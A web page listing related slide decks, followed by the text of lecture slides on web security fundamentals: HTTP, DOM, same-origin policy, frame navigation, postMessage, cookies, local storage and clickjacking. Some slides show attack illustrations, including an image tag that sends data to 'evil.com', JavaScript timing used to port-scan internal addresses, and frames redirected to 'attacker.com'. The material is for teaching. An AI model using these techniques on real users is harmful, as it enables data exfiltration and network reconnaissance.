Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
 
Introduction to Web Architecture
Introduction to Web ArchitectureIntroduction to Web Architecture
Introduction to Web Architecture
Chamnap Chhorn
 
Chapter5-Bypass-ClientSide-Control-Presentation.pptx
Chapter5-Bypass-ClientSide-Control-Presentation.pptxChapter5-Bypass-ClientSide-Control-Presentation.pptx
Chapter5-Bypass-ClientSide-Control-Presentation.pptx
ilhamilyas5
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 

More Related Content

Similar to XCS110_All_Slides.pdf

Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
Jeremiah Grossman
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
Matt Johansen
 
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
Association Paris-Web
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
Krishna T
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
Angelo Dell'Aera
 
Building Social Enterprise with Ruby and Salesforce
Building Social Enterprise with Ruby and SalesforceBuilding Social Enterprise with Ruby and Salesforce
Building Social Enterprise with Ruby and Salesforce
Raymond Gao
 
Decoding the Web
Decoding the WebDecoding the Web
Decoding the Web
newcircle
 
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric VanderburgEthical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Eric Vanderburg
 
Browser security
Browser securityBrowser security
Browser security
Uday Anand
 
21. Application Development and Administration in DBMS
21. Application Development and Administration in DBMS21. Application Development and Administration in DBMS
21. Application Development and Administration in DBMS
koolkampus
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 
Website designing company in faridabad
Website designing company in faridabadWebsite designing company in faridabad
Website designing company in faridabad
Css Founder
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_security
Michael Freyberger
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
msobiegraj
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
 
Application Security
Application SecurityApplication Security
Application Security
nirola
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
Jeremiah Grossman
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
 
Introduction to Web Architecture
Introduction to Web ArchitectureIntroduction to Web Architecture
Introduction to Web Architecture
Chamnap Chhorn
 
Chapter5-Bypass-ClientSide-Control-Presentation.pptx
Chapter5-Bypass-ClientSide-Control-Presentation.pptxChapter5-Bypass-ClientSide-Control-Presentation.pptx
Chapter5-Bypass-ClientSide-Control-Presentation.pptx
ilhamilyas5
 

Similar to XCS110_All_Slides.pdf (20)

Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Building Social Enterprise with Ruby and Salesforce
Building Social Enterprise with Ruby and SalesforceBuilding Social Enterprise with Ruby and Salesforce
Building Social Enterprise with Ruby and Salesforce
 
Decoding the Web
Decoding the WebDecoding the Web
Decoding the Web
 
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric VanderburgEthical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
 
Browser security
Browser securityBrowser security
Browser security
 
21. Application Development and Administration in DBMS
21. Application Development and Administration in DBMS21. Application Development and Administration in DBMS
21. Application Development and Administration in DBMS
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
 
Website designing company in faridabad
Website designing company in faridabadWebsite designing company in faridabad
Website designing company in faridabad
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_security
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
Application Security
Application SecurityApplication Security
Application Security
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Introduction to Web Architecture
Introduction to Web ArchitectureIntroduction to Web Architecture
Introduction to Web Architecture
 
Chapter5-Bypass-ClientSide-Control-Presentation.pptx
Chapter5-Bypass-ClientSide-Control-Presentation.pptxChapter5-Bypass-ClientSide-Control-Presentation.pptx
Chapter5-Bypass-ClientSide-Control-Presentation.pptx
 

Recently uploaded

Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
IndexBug
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
kumardaparthi1024
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
Neo4j
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 

Recently uploaded (20)

Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 

XCS110_All_Slides.pdf

  • 2.
  • 3. HTTP Rendering the Content Isolation Navigation Communication Client State Click-Jacking Frame Busting MODULE 2
  • 4. Introduction Module 2: Web Background and the Browser Security Model
  • 5. Reported Web Vulnerabilities "In the Wild" Data from aggregator and validator of NVD-reported vulnerabilities
  • 6. Web vs System vulnerabilities Decline in % web vulnerabilities since 2009 § 49% in 2010 -> 37% in 2011. § Big decline in SQL Injection vulnerabilities XSS peak
  • 7. Web application vulnerabilities 49% 51% Web Application Vulnerabilities as a Percentage of All Disclosures in 2010 Web Applications (49%) Others (51%) 37% 63% Web Application Vulnerabilities as a Percentage of All Disclosures in 2011 H1 Web Applications (49%) Others (51%)
  • 8.
  • 9. Web Security Challenge Bad Server Good server User How can honest users safely interact with well-intentioned sites, while still freely browsing the web (search, shopping, etc.) ? Network Enter password? Can also operate as client to other servers Browser
  • 10. Goals of web security Safely browse the web § Users should be able to visit a variety of web sites, without incurring harm: › No stolen information (without user’s permission) › Site A cannot compromise session at Site B Support secure web applications § Applications delivered over the web should have the same security properties we require for stand-alone applications And § Since many mobile apps are interfaces to web sites, § Support security for mobile apps.
  • 11. Web Threat Models Web attacker § Control attacker.com § Can obtain SSL/TLS certificate for attacker.com § User visits attacker.com › Or: runs attacker’s Facebook app Network attacker § Passive: Wireless eavesdropper § Active: Evil router, DNS poisoning Malware attacker § Attacker escapes browser isolation mechanisms and run separately under control of OS
  • 12. Outline § Web security goals and threat models § HTTP § Rendering: Html, DOM, embedded content, JavaScript § Isolation: frames, same-origin policy, HTML5 sandboxing § Communication: fragment, post-message, cross-origin request § Frame navigation: Same-origin policy, descendant policy § Client storage: Cookies, Local storage, Native Client § Click-jacking, tap-jacking, frame busting
  • 13. HTTP Module 2: Web Background and the Browser Security Model
  • 14. Uniform Resource Locator (URL) Global identifier of network-retrievable content Example: http://stanford.edu:81/class?name=cs155#homework Special characters are encoded as hex: § %0A = newline § %20 or + = space, %2B = + (special exception) Protocol Hostname Port Path Query Fragment
  • 15. GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Host: www.example.com Referer: http://www.google.com?q=dingbats HTTP Request Method File HTTP version Headers Data – none for GET Blank line GET : no side effect POST : possible side effect
  • 16. HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Set-Cookie: … Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML> HTTP Response HTTP version Status code Reason phrase Headers Data Cookies
  • 17. Rendering Content Module 2: Web Background and the Browser Security Model
  • 19. Browser execution model Each browser window or frame § Loads content § Renders it › Processes HTML and scripts to display page › May involve images, subframes, etc. § Responds to events Events can be § User actions: OnClick, OnMouseover § Rendering: OnLoad, OnBeforeUnload § Timing: setTimeout(), clearTimeout()
  • 20. <head> <title>Washington Post: Breaking News, World, US, DC News .. Analysis</title> ... </head> <body class="eidos homepage sectionfront"> <script type="text/javascript"> if(self!==top&&!(top.window.location.pathname).startsWith('/PortalEdito r')){top.location=self.location;} </script> ... <h2 class="headline"><a href="/world/national-security/nsa-gathered- thousands-of-americans-e-mails-before-court-struck-down- program/2013/08/21/146ba4b6-0a90-11e3-b87c-476db8ac34cd_story.html"> Secret court: <br>NSA gathered thousands of domestic e-mails</a> ... <p class="byline">Ellen Nakashima&#32…</p> <p class=""> The program unlawfully gathered as many as tens of thousands of e-mails, according to a 2011 opinion.</p> ... <div class="hide"><img class="" src="http://ad.doubleclick.net/ad/N4359.washingtonpost.com/B7241351.19;sz=1x1 ;ord=[timestamp]?" width="1" height="1" border="0" style="display: inline- block; "></div> ... Share this video: ... <a class="facebook_static" onclick="TWP.Module.SocialButtons.staticSocialPopup('http://www.facebook.com/ sharer.php?u=http://www.washingtonpost.com/posttv/video/thefold/tonight-on- the-fold-august-21-2013/2013/08/21/36ed282c-0a98-11e3-9941- 6711ed662e71_video.html%3Ffb_ref%3Dsm_btn_fb')"> ...
  • 21. Document Object Model (DOM) Object-oriented interface used to read and write docs § web page in HTML is structured data § DOM provides representation of this hierarchy Examples § Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ] § Methods: document.write(document.referrer) Includes Browser Object Model (BOM) § window, document, frames[], history, location, navigator (type and version of browser)
  • 22. Changing HTML using Script, DOM Some possibilities § createElement(elementName) § createTextNode(text) § appendChild(newChild) § removeChild(node) Example: Add a new list item: var list = document.getElementById('t1') var newitem = document.createElement('li') var newtext = document.createTextNode(text) list.appendChild(newitem) newitem.appendChild(newtext) <ul id="t1"> <li> Item 1 </li> </ul> HTML
  • 23. HTML Image Tags Displays this nice picture è Security issues? <html> … <p> … </p> … <img src=“http://example.com/sunset.gif” height="50" width="100"> … </html> Basic web functionality
  • 24. Image tag security issues Communicate with other sites § <img src=“http://evil.com/pass-local-information.jpg?extra_information”> Hide resulting image § <img src=“ … ” height=“1" width=“1"> Spoof other sites § Add logos that fool a user Important Point: A web page can send information to any site Security consequences
  • 25. JavaScript onError Basic function § Triggered when error occurs loading a document or an image Example § Runs onError handler if image does not exist and cannot load <img src="image.gif" onerror="alert('The image could not be loaded.')“ > http://www.w3schools.com/jsref/jsref_onError.asp Basic web functionality
  • 26. JavaScript timing Sample code § When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler. <html><body><img id="test" style="display: none"> <script> var test = document.getElementById(’test’); var start = new Date(); test.onerror = function() { var end = new Date(); alert("Total time: " + (end - start)); } test.src = "http://www.example.com/page.html"; </script> </body></html> Basic web functionality
  • 27. Port scanning behind firewall JavaScript can: § Request images from internal IP addresses › Example: <img src=“192.168.0.4:8080”/> § Use timeout/onError to determine success/failure § Fingerprint webapps using known image names Server Malicious Web page Firewall 1) “show me dancing pigs!” 2) “check this out” Browser scan scan scan 3) port scan results Basic web functionality
  • 28. Remote scripting Goal § Exchange data between a client-side app running in a browser and server-side app, without reloading page Methods § Java Applet/ActiveX control/Flash › Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers) § XML-RPC › open, standards-based technology that requires XML-RPC libraries on server and in your client-side code. § Simple HTTP via a hidden IFRAME › IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options See: http://developer.apple.com/internet/webcontent/iframe.html Important Point: A web can maintain bi-directional communication with browser (until user closes/quits)
  • 29. Simple remote scripting example <script type="text/javascript"> function handleResponse() { alert('this function is called from server.html') } </script> <iframe id="RSIFrame" name="RSIFrame" style="width:0px; height:0px; border: 0px" src="blank.html"> </iframe> <a href="server.html" target="RSIFrame">make RPC call</a> <script type="text/javascript"> window.parent.handleResponse() </script> server.html: another page on same server, could be server.php, etc client.html: RPC by passing arguments to server.html in query string RPC can be done silently in JavaScript, passing and receiving arguments
  • 30. Isolation Module 2: Web Background and the Browser Security Model
  • 31. Frame and iFrame Window may contain frames from different sources § Frame: rigid division as part of frameset § iFrame: floating inline frame iFrame example Why use frames? § Delegate screen area to content from another source § Browser provides isolation based on frames § Parent may work even if frame is broken <iframe src="hello.html" width=450 height=100> If you can see this, your browser doesn't understand IFRAME. </iframe>
  • 33. Analogy Operating system Primitives § System calls § Processes § Disk Principals: Users § Discretionary access control Vulnerabilities § Buffer overflow § Root exploit Web browser Primitives § Document object model § Frames § Cookies / localStorage Principals: “Origins” § Mandatory access control Vulnerabilities § Cross-site scripting § Cross-site request forgery § Cache history attacks § …
  • 34. Browser security mechanism Each frame of a page has an origin § Origin = protocol://host:port Frame can access its own origin § Network access, Read/write DOM, Storage (cookies) Frame cannot access data associated with a different origin A A B B A
  • 35. Components of browser security policy Frame-Frame relationships § canScript(A,B) › Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B? § canNavigate(A,B) › Can Frame A change the origin of content for Frame B? Frame-principal relationships § readCookie(A,S), writeCookie(A,S) › Can Frame A read/write cookies from site S?
  • 36. Library import excluded from SOP <script src=https://seal.verisign.com/getseal? host_name=a.com></script> •Script has privileges of imported page, NOT source server. •Can script other pages in this origin, load more scripts •Same issues with other forms of importing VeriSign
  • 37. Domain Relaxation Origin: scheme, host, (port), hasSetDomain Try document.domain = document.domain www.facebook.com www.facebook.com www.facebook.com chat.facebook.com chat.facebook.com
  • 38. Domain Relaxation Origin: scheme, host, (port), hasSetDomain Try document.domain = document.domain www.facebook.com www.facebook.com www.facebook.com chat.facebook.com chat.facebook.com facebook.com facebook.com
  • 39. HTML5 Frame sandbox Specify sandbox attribute of iframe <iframe sandbox src="http://untrusted.site.net/content"></iframe> Creates restricted frame § Plugins are disabled. Any kind of ActiveX, Flash, or Silverlight plugin will not be executed. § Forms are disabled. The hosted content is not allowed to post forms back to any target. § Scripts are disabled. JavaScript is disabled and will not execute. § Links to other browsing contexts are disabled. An anchor tag targeting different browser levels will not execute. § Unique origin treatment. All content is treated under a unique origin. The content is not able to traverse the DOM or read cookie information.
  • 40. Optional attributes relax sandbox allow-forms § Allows embedded page to post back using a form submit within the frame. allow-scripts § Enables JavaScript allow-same-origin § Can access DOM of another frame, subject to same-origin policy § Only useful with allow-scripts § But be careful: parent frame can manipulate sandbox attributes and remove further restrictions. allow-top-navigation § Allow content to navigate entire tab/window allow-popups § Allow embedded content to open new popup windows
  • 41. Navigation Module 2: Web Background and the Browser Security Model
  • 43. What should the policy be? 43 Child Sibling Descendant Frame Bust
  • 44. Browser Policy IE 6 (default) Permissive IE 6 (option) Child IE7 (no Flash) Descendant IE7 (with Flash) Permissive Firefox 2 Window Safari 3 Permissive Opera 9 Window HTML 5 Child Legacy Browser Behavior
  • 45. Window Policy Anomaly top.frames[1].location = "http://www.attacker.com/..."; top.frames[2].location = "http://www.attacker.com/..."; ...
  • 46. Browser Policy IE 6 (default) Permissive IE 6 (option) Child IE7 (no Flash) Descendant IE7 (with Flash) Permissive Firefox 2 Window Safari 3 Permissive Opera 9 Window HTML 5 Child Legacy Browser Behavior
  • 47. Browser Policy IE7 (no Flash) Descendant IE7 (with Flash) Descendant Firefox 3 Descendant Safari 3 Descendant Opera 9 (many policies) HTML 5 Descendant Adoption of Descendent Policy
  • 48. Communication Module 2: Web Background and the Browser Security Model
  • 49. Fragment Identifier Messaging Send information by navigating a frame § http://gadget.com/#hello Navigating to fragment doesn’t reload frame § No network traffic, but frame can read its fragment Not a secure channel § Confidentiality § Integrity § Authentication ü û ü
  • 50. window.postMessage API for inter-frame communication § Supported in current browsers § A network-like channel between frames Add a contact Share contacts
  • 51. window.addEventListener("message", function (e) { if (e.origin == "http://a.com") { ... e.data ... } }, false); frames[0].postMessage("Attack at dawn!", "http://b.com/"); postMessage syntax Facebook Anecdote Attack at dawn!
  • 52. frames[0].postMessage("Attack at dawn!"); Why include “targetOrigin”? What goes wrong? Messages sent to frames, not principals § When would this happen? 52
  • 53. Two-way communication A method call is associated with a response Can build this on top of postMessage § Messenger: Each time you call a method in the iframe, you pass a reply function that is called with the results of that method call.
  • 54. jQuery postMessage plugin Wraps the postMessage API and simplifies its usage. Works in browsers that do not support postMessage method by using fragment navigation (hash portion of the url)
  • 55. Network communication Cross-origin network requests Access-Control-Allow-Origin: <list of domains> Access-Control-Allow-Origin: * Site B Site A Site A context Site B context
  • 56. Client State Module 2: Web Background and the Browser Security Model
  • 57. Cookies Used to store state on user’s machine Browser Server POST … HTTP Header: Set-cookie: NAME=VALUE ; domain = (who can read) ; expires = (when expires) ; secure = (only over SSL) Browser Server GET … Cookie: NAME = VALUE HTTP is stateless protocol; cookies add state If expires=NULL: this session only
  • 58. Cookie authentication Browser Web Server Auth server POST login.cgi Username & pwd Validate user auth=val Store val Set-cookie: auth=val GET restricted.html Cookie: auth=val restricted.html auth=val YES/NO If YES, restricted.html Check val
  • 59. Cookie Security Policy Uses: § User authentication § Personalization § User tracking: e.g. Doubleclick (3rd party cookies) Origin is the tuple <domain, path> § Can set cookies valid across a domain suffix § Complicated and implementation-specific rules for selecting cookie values, when many cookies apply
  • 60. Secure Cookies Browser Server GET … HTTP Header: Set-cookie: NAME=VALUE ; Secure=true • Provides confidentiality against network attacker • Browser will only send cookie back over HTTPS • … but no integrity • Can rewrite secure cookies over HTTP Þ network attacker can rewrite secure cookies Þ can log user into attacker’s account
  • 61. httpOnly Cookies Browser Server GET … HTTP Header: Set-cookie: NAME=VALUE ; httpOnly • Cookie sent over HTTP(s), but not accessible to scripts • cannot be read via document.cookie • Helps prevent cookie theft via XSS … but does not stop most other risks of XSS bugs
  • 62. HTML5 Local Storage Based on named key/value pairs § Store data based on a named key (a string) § Retrieve that data with the same key § Data can be any type supported by JavaScript › Including strings, Booleans, integers, floats › But data is actually stored as a string Need to use functions like parseInt() or parseFloat() to coerce your retrieved data into the expected JavaScript datatype Some browsers also implement Web SQL Database § Other forms of local storage would also be useful
  • 63. var data = localStorage.getItem(1); localStorage.setItem(1,'This is a sample sentence'); Example Save a sentence in Local Storage : Retrieve it: Local Storage supports length, removeItem() and clear().
  • 64. Security issues Storage per origin § Origin is: scheme, host, port Could be accessed by user with local access (varies by browser) Can be accessed by JavaScript in page § no httpOnly so vulnerable to XSS attacks XSS attacks can read local storage § Do not store sensitive information XSS attacks can write local storage § Do not trust data read from local storage
  • 67. Sandbox techniques Static analysis § No loads or stores permitted outside the data sandbox › Enforced by operating system protection mechanisms § No unsafe instructions › Examples: syscall, int, and lds. § Control flow integrity › All direct, indirect branches target a safe instruction Dynamic monitoring § Native Client runtime mediates system calls
  • 68. Click-Jacking Module 2: Web Background and the Browser Security Model
  • 69. Attacker overlays multiple transparent or opaque frames to trick a user into clicking on a button or link on another page Clicks meant for the visible page are hijacked and routed to another, invisible page Clickjacking slide 69
